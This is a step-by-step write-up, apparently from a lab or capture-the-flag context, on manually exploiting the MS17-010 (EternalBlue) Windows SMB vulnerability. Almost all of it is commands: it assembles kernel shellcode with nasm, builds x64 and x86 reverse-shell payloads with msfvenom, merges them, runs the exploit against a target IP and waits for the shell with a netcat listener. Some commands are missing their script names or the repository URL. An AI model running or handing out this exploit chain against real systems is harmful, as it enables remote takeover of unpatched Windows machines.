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Manually Exploiting MS17-010 (python2 to python3)

This is a quick write-up on how to exploit MS17-10 after enumerating your victim machine.

I was trying to run Auto-Blue but with the switch from python2 to python3 I was hitting some hurdles. I read somewhere that you can run pyenv as a workaround but I needed this to work in a crunch. This was pulled from the root4loot blogpost and all thanks really goes to them on this one, check it out! Link

Step 1. Grab the code from


git clone

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Step 2. Display the contents of the folder


ls -l MS17-010/shellcode/

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Step 3. The next step in their walk-through is to assemble both the x64 and x86 shellcode then merge them below. You can get away with only doing 1 but if you dont know the arch then it could not work.

Assemble kernel shellcode with nasm.


nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin

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Step 4. Now generate a binary payload with your LHOST and name it sc_x64_payload.bin.


msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=tun0 --platform windows -a x64 --format raw -o sc_x64_payload.bin

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Step 5. Concentrate payload & shellcode


cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
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Step 6. Now assemble the kernel shellcode with nasm.


nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin

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Step 7. Then generate a binary payload and label this one sc_x86_payload.bin


msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=tun0 --platform windows -a x86 --format raw -o sc_x86_payload.bin

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Step 8. Concentrate payload and shellcode.


cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

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Step 9. Now its time to merge them if that's what you would like to do. This will put them in the same binary and included in the script.


python MS17-010/shellcode/ sc_x86.bin sc_x64.bin sc_all.bin

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Step 10. Now run the exploit. Just as a warning I had to run this multiple times to catch a shell and reverted my box as well.


python MS17-010/ targetIP sc_all.bin

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nc -nvlp 443

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